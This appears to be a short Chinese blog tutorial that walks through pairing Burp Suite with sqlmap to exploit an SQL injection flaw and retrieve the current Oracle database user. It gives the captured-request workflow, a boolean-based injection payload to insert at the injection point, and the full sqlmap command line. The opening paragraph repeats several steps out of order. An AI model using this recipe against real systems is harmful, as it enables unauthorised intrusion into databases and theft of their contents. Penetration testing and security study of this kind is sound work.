burpsuite和sqlmap配合,通过sql注入漏洞爆oracle当前用户
注:--proxy=http://127.0.0.1:8080是为了burpsuite里面HTTP history可以看到记录,方便检查访问是正常的,后续为了性能,可以不要。3.点击有注入漏洞的历史记录,保存到文件zhj.txt。burpsuite_pro_v2023.6安装成功。4.编辑保存的文件zhj.txt,找到注入点,加入。..............等待成果。2.在浏览器里面操作,可看历
0.环境准备
python
sqlmap代码下载
burpsuite_pro_v2023.6安装成功
1.打开burpsuite_pro_v2023.6自带的浏览器
2.在浏览器里面操作,可看历史记录
3.点击有注入漏洞的历史记录,保存到文件zhj.txt
4.编辑保存的文件zhj.txt,找到注入点,加入
,(case+when+1=1*+then+1+else+2+end)
5.运行
python sqlmap.py -r E:\python\zhj.txt --proxy=http://127.0.0.1:8080 --dbms=oracle --technique=B --current-db -batch
..............等待成果。
注:--proxy=http://127.0.0.1:8080是为了burpsuite里面HTTP history可以看到记录,方便检查访问是正常的,后续为了性能,可以不要。
魔乐社区(Modelers.cn) 是一个中立、公益的人工智能社区,提供人工智能工具、模型、数据的托管、展示与应用协同服务,为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作,由全产业链共同建设、共同运营、共同享有,推动国产AI生态繁荣发展。
更多推荐
11
0- 0
已为社区贡献1条内容
所有评论(0)